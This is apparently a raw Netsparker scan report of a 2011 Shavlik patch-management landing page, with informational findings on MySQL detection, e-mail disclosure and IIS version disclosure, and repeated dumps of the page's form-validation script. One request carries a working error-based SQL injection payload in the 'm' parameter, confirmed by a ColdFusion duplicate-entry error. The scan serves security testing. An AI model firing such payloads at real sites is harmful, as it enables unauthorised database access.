alert("Please enter your email address");
}

else if((document.getElementById('m_txtEmail').value.indexOf(".") == -1) || document.getElementById('m_txtEmail').value.indexOf("@") == -1)
{
alert("Please enter a valid email address");
}

else if(document.getElementById('m_txtPhone').value == "" || document.getElementById('m_txtPhone').value.length < 10 || document.getElementById('m_txtPhone').value.length > 50)
{
alert("Please enter your Phone Number, at least 10 characters");
}

else if(document.getElementById('m_txtCompany').value == "")
{
alert("Please enter your Company Name");
}
else if(document.getElementById('m_ddlStates').value == 0)
{
alert("Please Choose Your State");
}
else if(document.getElementById('sEmployees').value == '')
{
alert("Please Choose the size of your company");
}
else if(document.getElementById('sTitle').value == '')
{
alert("Please Choose your job title");
}

else
{
sLN = document.getElementById('m_txtLastName').value;


document.getElementById('DownloadInfo').action = '/shavlik/download.cfm?nFileID=0&pg=697';
document.getElementById('DownloadInfo').target = 'regFrame2';
document.getElementById('DownloadInfo').submit();

document.getElementById('m_txtLastName').value += ' -O';

if(document.getElementById('netchk').checked == 1)
{
empNode = document.getElementById('sEmployees');
empNode.parentNode.removeChild(empNode);

titleNode = document.getElementById('sTitle');
titleNode.parentNode.removeChild(titleNode);

document.getElementById('DownloadInfo').action = 'http://www.shavlik.com/pDownloadForm4.aspx';
document.getElementById('DownloadInfo').target = 'regFrame';
document.getElementById('DownloadInfo').submit();

}

document.getElementById('m_txtLastName').value = sLN;

if(document.getElementById('netchk').checked == 1){
sNET = document.getElementById('netchk').value = 1;
}
else
{
sNET = document.getElementById('netchk').value = 0;
}

if(document.getElementById('caseStudy').checked == 1)
{
sCASE = document.getElementById('caseStudy').value = 1;
}
else
{
sCASE = document.getElementById('caseStudy').value = 0;
}

if(document.getElementById('webinar').checked == 1)
{
sWEB = document.getElementById('webinar').value = 1;
}
else
{
sWEB = document.getElementById('webinar').value = 0;
}

retValue = true;

sUrl = 'thank.cfm?bnetchk=' + sNET + '&bcaseStudy=' + sCASE + '&bwebinar=' + sWEB;

Shadowbox.open({
content: sUrl,
player: "iframe",
width: 500,
height: 400
});



}

return retValue;
}



</script>













































































































































































































<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Security software - Free trial Shavlik automated patch mgmt + antivirus</title>


<link rel="stylesheet" href="style/style5.css" type="text/css" media="all" />
<!--[if IE 6]>
<style>
#navitem a {padding-bottom:0px;}
</style>
<![endif]-->
<script language="javascript" type="text/javascript">
function windowOpen(sURL, bFade, sWindowName) {

if (bFade) {
document.getElementById("body").style.backgroundColor = "gray";
}

sWindowName = sWindowName || "newWindow";

nPosX = (window.screen.width/2) - (400);
nPosY = (window.screen.height/2) - (350 + 75);

newWindow = window.open(sURL,sWindowName,"status=0,toolbar=0,scrollbars=1,width=800,height=600,screenX=" + nPosX + ",screenY=" + nPosY);

newWindow.focus();

}


var req;

function docLoad(url) {
req = false;
// non IE
if(window.XMLHttpRequest && !(window.ActiveXObject)) {
try {
req = new XMLHttpRequest();
} catch(e) {
req = false;
}
// IE
} else if(window.ActiveXObject) {
try {
req = new ActiveXObject("Msxml2.XMLHTTP");
} catch(e) {
try {
req = new ActiveXObject("Microsoft.XMLHTTP");
} catch(e) {
req = false;
}
}
}

if(req) {
//req.onreadystatechange = processReqChange;
req.open("GET", url, false);
req.send("");

}

//req = false;

}

function downloadRecord(fileID)
{

sURL = "download.cfm?nFileID=" + fileID + "&a=1";
docLoad(sURL);

}


</script>
<link rel="stylesheet" type="text/css" href="shadowbox/shadowbox.css">
<script type="text/javascript" src="shadowbox/shadowbox.js"></script>
<script type="text/javascript">

function userCheck(sURL,nID) {

docLoad('userCheck.cfm');

if (req.responseText == 'num0') {

Shadowbox.open({
content: 'download.cfm?nFileID=0&a=1',
player: "iframe"
});

return true;

}

else if (sURL.search('.wmv') != -1) {

Shadowbox.open({
content: sURL,
player: "html",
width: 700,
height: 570

});

downloadRecord(nID);

return true;

}

else {

Shadowbox.open({
content: sURL,
player: "flv",
width: 640,
height: 364

});

downloadRecord(nID);

return true;
}

}

Shadowbox.init({
modal: true

});

</script>

<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-22410401-11']);
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

</script>


</head>








































































































































































































































































<body> <div id="wrapper"> <div style="background-image:url('images/SHAV_topBar.jpg'); background-repeat:no-repeat; height:30px;"></div> <div id="container"> <div id="logo"> <a href="index.cfm?pg=374" target="_blank"><img src="images/SHAV_INT_downloadForm_btn.jpg" style="border:none; float:right; margin-right:20px;"></a> </div> <div id="topContainer"> <img src="images/Shav_LP_serious_safe.png" style="margin:-25px 0 -20px 65px; position:absolute;">

<div id="content">
<h1 style="font-size:40px; margin-top:0;">Comprehensive security software that can make life easier</h1>
<img src="images/SHAV_LP_patch_logo.png">

<p class="contentCopy">
<strong>NetChk®</strong> Protect is the comprehensive agentless patch management system designed to meet today’s most pressing IT challenges. NetChk® Protect simplifies the complexity of IT management by automating patching – for both your operating system and for third-party applications – so you’re protected from every angle.
<br /><br />
In less than 30 minutes, <strong>NetChk®</strong> Protect will be up and running, detecting and deploying missing patches.
<br /><br />
<strong>NetChk®</strong> Protect also includes the Sunbelt VIPRE Enterprise Antivirus + Antispyware + Antimalware engine to integrate world-class antivirus protection with comprehensive patch management for faster, more cost-effective network security.
</p>
</div>
<div style="background-image:url('images/SHAV_blackLine.jpg'); background-repeat:no-repeat; height:19px;"></div> </div> <div id="bottomContainer"><!--- bottomContainer ---> <div id="leftBottom">
<a href="index.cfm?pg=704" style="text-decoration:none;"><h2>SimplexITy Bundle Savings of 80% <img src="images/Shav_LP_serious_arrow.png" style="border:0;"></h2></a>

<h3 style="font-style:italic;">For a limited time, the more Shavlik IT Management products you use, the more you save.</h3>
<p class="bottomCopy">NetChk® Protect is part of the Shavlik SimplexITy Bundle, the ultimate IT management solution for network professionals. Combining our best-in-class network security and IT management applications, the bundle is the comprehensive answer to your patch management, antivirus, power management, and configuration challenges.</p>

<h3 style="font-style:italic;">Explore the Shavlik SimplexITy Bundle:</h3>

<p class="bottomCopy">Click on the links below for detailed information on each functionality that can simplify your IT workload:</p>

<ul class="bottomCopy" style="margin-left:15px; padding:0; line-height:26px;">
<li><a href="index.cfm?pg=697" class="current">Automated Patch Management</a></li>
<li><a href="index.cfm?pg=698">Next-generation Enterprise Antivirus</a></li>
<li><a href="index.cfm?pg=701">Centralized Power Management</a></li>
<li><a href="index.cfm?pg=699">Simplified Configuration and Compliance</a></li>
</ul>
</div> <div id="middleBottom">
<p class="bottomCopy" style="margin-top:0;">For a fraction of the money you spend for antivirus protection today, you can simplify the complexity of IT management and have complete protection against your top security threats.</p>

<img src="images/Shav_LP_serious_piggyBank.jpg" style="padding-top:10px;">
</div> <!--- formDIV ---> <div id="rightBottom"> <tr> <td> <form name="DownloadInfo" method="post" action="http://www.shavlik.com/pDownloadForm4.aspx" id="DownloadInfo" style="text-align: center;" target="regFrame"> <p id="formHeader">Download a FREE Trial Today</p>

<p class="bottomCopy" style="margin-bottom:0;">Register today to try Shavlik’s NetChk® Protect patch management - or save even more by upgrading to the SimplexITy bundle! <span style="font-style:italic; font-size:11px;">* Denotes Required Fields</span></p>

<div style="display:none;">
<input type="checkbox" name="caseStudy" id="caseStudy" value="1">

<input type="checkbox" name="webinar" id="webinar" value="1">

<input type="checkbox" name="netchk" id="netchk" value="1" checked>
</div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" v..
MySQL Database Identified

MySQL Database Identified

1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the target web site is using a MySQL Server. This is generally not a security issue and is reported here for information purposes.

Impact

This issue is reported as additional information only, there is no direct impact arising from this issue.
- /shavlik/index.cfm

/shavlik/index.cfm CONFIRMED

http://learn.shavlik.com/shavlik/index.cfm?m=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CO..

Request

GET /shavlik/index.cfm?m=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Cookie: CFID=799689; CFTOKEN=67476078
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 25 Apr 2011 12:16:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
































































































































<iframe name = "regFrame" id = "regFrame" style="display:none;" width="800" height=400></iframe>
<iframe name = "regFrame2" id = "regFrame2" style="display:none;" width="800" height=400></iframe>

<script type="text/javascript">

function formCheck() {

retValue = false;

if(document.getElementById('m_txtFirstName').value == "" || document.getElementById('m_txtFirstName').value.length < 2 || document.getElementById('m_txtFirstName').value.length > 55)
{
alert("Please enter your First Name, between 2 and 55 characters");
}

else if(document.getElementById('m_txtLastName').value == "" || document.getElementById('m_txtLastName').value.length < 2 || document.getElementById('m_txtLastName').value.length > 55)
{
alert("Please enter your Last Name, between 2 and 55 characters");
}

else if(document.getElementById('m_txtEmail').value == "")
{
alert("Please enter your email address");
}

else if((document.getElementById('m_txtEmail').value.indexOf(".") == -1) || document.getElementById('m_txtEmail').value.indexOf("@") == -1)
{
alert("Please enter a valid email address");
}

else if(document.getElementById('m_txtPhone').value == "" || document.getElementById('m_txtPhone').value.length < 10 || document.getElementById('m_txtPhone').value.length > 50)
{
alert("Please enter your Phone Number, at least 10 characters");
}

else if(document.getElementById('m_txtCompany').value == "")
{
alert("Please enter your Company Name");
}
else if(document.getElementById('m_ddlStates').value == 0)
{
alert("Please Choose Your State");
}
else if(document.getElementById('sEmployees').value == '')
{
alert("Please Choose the size of your company");
}
else if(document.getElementById('sTitle').value == '')
{
alert("Please Choose your job title");
}

else
{
sLN = document.getElementById('m_txtLastName').value;


document.getElementById('DownloadInfo').action = '/shavlik/download.cfm?nFileID=0&pg=697';
document.getElementById('DownloadInfo').target = 'regFrame2';
document.getElementById('DownloadInfo').submit();

document.getElementById('m_txtLastName').value += ' -O';

if(document.getElementById('netchk').checked == 1)
{
empNode = document.getElementById('sEmployees');
empNode.parentNode.removeChild(empNode);

titleNode = document.getElementById('sTitle');
titleNode.parentNode.removeChild(titleNode);

document.getElementById('DownloadInfo').action = 'http://www.shavlik.com/pDownloadForm4.aspx';
document.getElementById('DownloadInfo').target = 'regFrame';
document.getElementById('DownloadInfo').submit();

}

document.getElementById('m_txtLastName').value = sLN;

if(document.getElementById('netchk').checked == 1){
sNET = document.getElementById('netchk').value = 1;
}
else
{
sNET = document.getElementById('netchk').value = 0;
}

if(document.getElementById('caseStudy').checked == 1)
{
sCASE = document.getElementById('caseStudy').value = 1;
}
else
{
sCASE = document.getElementById('caseStudy').value = 0;
}

if(document.getElementById('webinar').checked == 1)
{
sWEB = document.getElementById('webinar').value = 1;
}
else
{
sWEB = document.getElementById('webinar').value = 0;
}

retValue = true;

sUrl = 'thank.cfm?bnetchk=' + sNET + '&bcaseStudy=' + sCASE + '&bwebinar=' + sWEB;

Shadowbox.open({
content: sUrl,
player: "iframe",
width: 500,
height: 400
});



}

return retValue;
}



</script>






































<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>

<font face="arial"></font>



<html>
<head>
<title>Error Occurred While Processing Request</title>


<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}

if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>


</head>
<body>

<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.

</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">






















<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Error Executing Database Query.
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Duplicate entry '_!@4dilemma:1' for key 1
</font>
</td>
</tr>
<tr>
<td height>&nbsp;</td>
</tr>


















<tr><td>

<table border="0" cellpadding="0" cellspacing="0">



</table>
</td></tr>




<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>

<li>Enable Robust Exception Information to provide greater detail about the source of errors. In the Administrator, click Debugging & Logging > Debug Output Settings, and select the Robust Exception Information option.</li>


<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a> to find a solution to your problem.</li>

</ul>
<p>
</td>
</tr>

<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">173.193.214.243</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana"></td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">25-Apr-11 07:16 AM</td>
</tr>
</table>
</td>
</tr>
</table>



</font>
</td>
</tr>
</table>
</body></html>







E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /shavlik/index.cfm

/shavlik/index.cfm

http://learn.shavlik.com/shavlik/index.cfm?m=1112&pg=697&h=0&hp=697&utm_term=vulnerability%20managem..

Request

GET /shavlik/index.cfm?m=1112&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:16:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=799686;expires=Wed, 17-Apr-2041 12:16:17 GMT;path=/,CFTOKEN=50906304;expires=Wed, 17-Apr-2041 12:16:17 GMT;path=/
Content-Type: text/html; charset=UTF-8


































































































































<iframe name = "regFrame" id = "regFrame" style="display:none;" width="800" height=400></iframe>
<iframe name = "regFrame2" id = "regFrame2" style="display:none;" width="800" height=400></iframe>

<script type="text/javascript">

function formCheck() {

retValue = false;

if(document.getElementById('m_txtFirstName').value == "" || document.getElementById('m_txtFirstName').value.length < 2 || document.getElementById('m_txtFirstName').value.length > 55)
{
alert("Please enter your First Name, between 2 and 55 characters");
}

else if(document.getElementById('m_txtLastName').value == "" || document.getElementById('m_txtLastName').value.length < 2 || document.getElementById('m_txtLastName').value.length > 55)
{
alert("Please enter your Last Name, between 2 and 55 characters");
}

else if(document.getElementById('m_txtEmail').value == "")
{
alert("Please enter your email address");
}

else if((document.getElementById('m_txtEmail').value.indexOf(".") == -1) || document.getElementById('m_txtEmail').value.indexOf("@") == -1)
{
alert("Please enter a valid email address");
}

else if(document.getElementById('m_txtPhone').value == "" || document.getElementById('m_txtPhone').value.length < 10 || document.getElementById('m_txtPhone').value.length > 50)
{
alert("Please enter your Phone Number, at least 10 characters");
}

else if(document.getElementById('m_txtCompany').value == "")
{
alert("Please enter your Company Name");
}
else if(document.getElementById('m_ddlStates').value == 0)
{
alert("Please Choose Your State");
}
else if(document.getElementById('sEmployees').value == '')
{
alert("Please Choose the size of your company");
}
else if(document.getElementById('sTitle').value == '')
{
alert("Please Choose your job title");
}

else
{
sLN = document.getElementById('m_txtLastName').value;


document.getElementById('DownloadInfo').action = '/shavlik/download.cfm?nFileID=0&pg=697';
document.getElementById('DownloadInfo').target = 'regFrame2';
document.getElementById('DownloadInfo').submit();

document.getElementById('m_txtLastName').value += ' -O';

if(document.getElementById('netchk').checked == 1)
{
empNode = document.getElementById('sEmployees');
empNode.parentNode.removeChild(empNode);

titleNode = document.getElementById('sTitle');
titleNode.parentNode.removeChild(titleNode);

document.getElementById('DownloadInfo').action = 'http://www.shavlik.com/pDownloadForm4.aspx';
document.getElementById('DownloadInfo').target = 'regFrame';
document.getElementById('DownloadInfo').submit();

}

document.getElementById('m_txtLastName').value = sLN;

if(document.getElementById('netchk').checked == 1){
sNET = document.getElementById('netchk').value = 1;
}
else
{
sNET = document.getElementById('netchk').value = 0;
}

if(document.getElementById('caseStudy').checked == 1)
{
sCASE = document.getElementById('caseStudy').value = 1;
}
else
{
sCASE = document.getElementById('caseStudy').value = 0;
}

if(document.getElementById('webinar').checked == 1)
{
sWEB = document.getElementById('webinar').value = 1;
}
else
{
sWEB = document.getElementById('webinar').value = 0;
}

retValue = true;

sUrl = 'thank.cfm?bnetchk=' + sNET + '&bcaseStudy=' + sCASE + '&bwebinar=' + sWEB;

Shadowbox.open({
content: sUrl,
player: "iframe",
width: 500,
height: 400
});



}

return retValue;
}



</script>













































































































































































































<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Security software - Free trial Shavlik automated patch mgmt + antivirus</title>


<link rel="stylesheet" href="style/style5.css" type="text/css" media="all" />
<!--[if IE 6]>
<style>
#navitem a {padding-bottom:0px;}
</style>
<![endif]-->
<script language="javascript" type="text/javascript">
function windowOpen(sURL, bFade, sWindowName) {

if (bFade) {
document.getElementById("body").style.backgroundColor = "gray";
}

sWindowName = sWindowName || "newWindow";

nPosX = (window.screen.width/2) - (400);
nPosY = (window.screen.height/2) - (350 + 75);

newWindow = window.open(sURL,sWindowName,"status=0,toolbar=0,scrollbars=1,width=800,height=600,screenX=" + nPosX + ",screenY=" + nPosY);

newWindow.focus();

}


var req;

function docLoad(url) {
req = false;
// non IE
if(window.XMLHttpRequest && !(window.ActiveXObject)) {
try {
req = new XMLHttpRequest();
} catch(e) {
req = false;
}
// IE
} else if(window.ActiveXObject) {
try {
req = new ActiveXObject("Msxml2.XMLHTTP");
} catch(e) {
try {
req = new ActiveXObject("Microsoft.XMLHTTP");
} catch(e) {
req = false;
}
}
}

if(req) {
//req.onreadystatechange = processReqChange;
req.open("GET", url, false);
req.send("");

}

//req = false;

}

function downloadRecord(fileID)
{

sURL = "download.cfm?nFileID=" + fileID + "&a=1";
docLoad(sURL);

}


</script>
<link rel="stylesheet" type="text/css" href="shadowbox/shadowbox.css">
<script type="text/javascript" src="shadowbox/shadowbox.js"></script>
<script type="text/javascript">

function userCheck(sURL,nID) {

docLoad('userCheck.cfm');

if (req.responseText == 'num0') {

Shadowbox.open({
content: 'download.cfm?nFileID=0&a=1',
player: "iframe"
});

return true;

}

else if (sURL.search('.wmv') != -1) {

Shadowbox.open({
content: sURL,
player: "html",
width: 700,
height: 570

});

downloadRecord(nID);

return true;

}

else {

Shadowbox.open({
content: sURL,
player: "flv",
width: 640,
height: 364

});

downloadRecord(nID);

return true;
}

}

Shadowbox.init({
modal: true

});

</script>

<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-22410401-11']);
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

</script>


</head>








































































































































































































































































<body> <div id="wrapper"> <div style="background-image:url('images/SHAV_topBar.jpg'); background-repeat:no-repeat; height:30px;"></div> <div id="container"> <div id="logo"> <a href="index.cfm?pg=374" target="_blank"><img src="images/SHAV_INT_downloadForm_btn.jpg" style="border:none; float:right; margin-right:20px;"></a> </div> <div id="topContainer"> <img src="images/Shav_LP_serious_safe.png" style="margin:-25px 0 -20px 65px; position:absolute;">

<div id="content">
<h1 style="font-size:40px; margin-top:0;">Comprehensive security software that can make life easier</h1>
<img src="images/SHAV_LP_patch_logo.png">

<p class="contentCopy">
<strong>NetChk®</strong> Protect is the comprehensive agentless patch management system designed to meet today’s most pressing IT challenges. NetChk® Protect simplifies the complexity of IT management by automating patching – for both your operating system and for third-party applications – so you’re protected from every angle.
<br /><br />
In less than 30 minutes, <strong>NetChk®</strong> Protect will be up and running, detecting and deploying missing patches.
<br /><br />
<strong>NetChk®</strong> Protect also includes the Sunbelt VIPRE Enterprise Antivirus + Antispyware + Antimalware engine to integrate world-class antivirus protection with comprehensive patch management for faster, more cost-effective network security.
</p>
</div>
<div style="background-image:url('images/SHAV_blackLine.jpg'); background-repeat:no-repeat; height:19px;"></div> </div> <div id="bottomContainer"><!--- bottomContainer ---> <div id="leftBottom">
<a href="index.cfm?pg=704" style="text-decoration:none;"><h2>SimplexITy Bundle Savings of 80% <img src="images/Shav_LP_serious_arrow.png" style="border:0;"></h2></a>

<h3 style="font-style:italic;">For a limited time, the more Shavlik IT Management products you use, the more you save.</h3>
<p class="bottomCopy">NetChk® Protect is part of the Shavlik SimplexITy Bundle, the ultimate IT management solution for network professionals. Combining our best-in-class network security and IT management applications, the bundle is the comprehensive answer to your patch management, antivirus, power management, and configuration challenges.</p>

<h3 style="font-style:italic;">Explore the Shavlik SimplexITy Bundle:</h3>

<p class="bottomCopy">Click on the links below for detailed information on each functionality that can simplify your IT workload:</p>

<ul class="bottomCopy" style="margin-left:15px; padding:0; line-height:26px;">
<li><a href="index.cfm?pg=697" class="current">Automated Patch Management</a></li>
<li><a href="index.cfm?pg=698">Next-generation Enterprise Antivirus</a></li>
<li><a href="index.cfm?pg=701">Centralized Power Management</a></li>
<li><a href="index.cfm?pg=699">Simplified Configuration and Compliance</a></li>
</ul>
</div> <div id="middleBottom">
<p class="bottomCopy" style="margin-top:0;">For a fraction of the money you spend for antivirus protection today, you can simplify the complexity of IT management and have complete protection against your top security threats.</p>

<img src="images/Shav_LP_serious_piggyBank.jpg" style="padding-top:10px;">
</div> <!--- formDIV ---> <div id="rightBottom"> <tr> <td> <form name="DownloadInfo" method="post" action="http://www.shavlik.com/pDownloadForm4.aspx" id="DownloadInfo" style="text-align: center;" target="regFrame"> <p id="formHeader">Download a FREE Trial Today</p>

<p class="bottomCopy" style="margin-bottom:0;">Register today to try Shavlik’s NetChk® Protect patch management - or save even more by upgrading to the SimplexITy bundle! <span style="font-style:italic; font-size:11px;">* Denotes Required Fields</span></p>

<div style="display:none;">
<input type="checkbox" name="caseStudy" id="caseStudy" value="1">

<input type="checkbox" name="webinar" id="webinar" value="1">

<input type="checkbox" name="netchk" id="netchk" value="1" checked>
</div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" v..
IIS Version Disclosure

IIS Version Disclosure

1 TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

Impact

An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.

Remediation

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /shavlik/index.cfm

/shavlik/index.cfm

http://learn.shavlik.com/shavlik/index.cfm?m=1112&pg=697&h=0&hp=697&utm_term=vulnerability%20managem..

Extracted Version

Microsoft-IIS/6.0

Request

GET /shavlik/index.cfm?m=1112&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:16:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=799686;expires=Wed, 17-Apr-2041 12:16:17 GMT;path=/,CFTOKEN=50906304;expires=Wed, 17-Apr-2041 12:16:17 GMT;path=/
Content-Type: text/html; charset=UTF-8


































































































































<iframe name = "regFrame" id = "regFrame" style="display:none;" width="800" height=400></iframe>
<iframe name = "regFrame2" id = "regFrame2" style="display:none;" width="800" height=400></iframe>

<script type="text/javascript">

function formCheck() {

retValue = false;

if(document.getElementById('m_txtFirstName').value == "" || document.getElementById('m_txtFirstName').value.length < 2 || document.getElementById('m_txtFirstName').value.length > 55)
{
alert("Please enter your First Name, between 2 and 55 characters");
}

else if(document.getElementById('m_txtLastName').value == "" || document.getElementById('m_txtLastName').value.length < 2 || document.getElementById('m_txtLastName').value.length > 55)
{
alert("Please enter your Last Name, between 2 and 55 characters");
}

else if(document.getElementById('m_txtEmail').value == "")
{
alert("Please enter your email address");
}

else if((document.getElementById('m_txtEmail').value.indexOf(".") == -1) || document.getElementById('m_txtEmail').value.indexOf("@") == -1)
{
alert("Please enter a valid email address");
}

else if(document.getElementById('m_txtPhone').value == "" || document.getElementById('m_txtPhone').value.length < 10 || document.getElementById('m_txtPhone').value.length > 50)
{
alert("Please enter your Phone Number, at least 10 characters");
}

else if(document.getElementById('m_txtCompany').value == "")
{
alert("Please enter your Company Name");
}
else if(document.getElementById('m_ddlStates').value == 0)
{
alert("Please Choose Your State");
}
else if(document.getElementById('sEmployees').value == '')
{
alert("Please Choose the size of your company");
}
else if(document.getElementById('sTitle').value == '')
{
alert("Please Choose your job title");
}

else
{
sLN = document.getElementById('m_txtLastName').value;


document.getElementById('DownloadInfo').action = '/shavlik/download.cfm?nFileID=0&pg=697';
document.getElementById('DownloadInfo').target = 'regFrame2';
document.getElementById('DownloadInfo').submit();

document.getElementById('m_txtLastName').value += ' -O';

if(document.getElementById('netchk').checked == 1)
{
empNode = document.getElementById('sEmployees');
empNode.parentNode.removeChild(empNode);

titleNode = document.getElementById('sTitle');
titleNode.parentNode.removeChild(titleNode);

document.getElementById('DownloadInfo').action = 'http://www.shavlik.com/pDownloadForm4.aspx';
document.getElementById('DownloadInfo').target = 'regFrame';
document.getElementById('DownloadInfo').submit();

}

document.getElementById('m_txtLastName').value = sLN;

if(document.getElementById('netchk').checked == 1){
sNET = document.getElementById('netchk').value = 1;
}
else
{
sNET = document.getElementById('netchk').value = 0;
}

if(document.getElementById('caseStudy').checked == 1)
{
sCASE = document.getElementById('caseStudy').value = 1;
}
else
{
sCASE = document.getElementById('caseStudy').value = 0;
}

if(document.getElementById('webinar').checked == 1)
{
sWEB = document.getElementById('webinar').value = 1;
}
else
{
sWEB = document.getElementById('webinar').value = 0;
}

retValue = true;

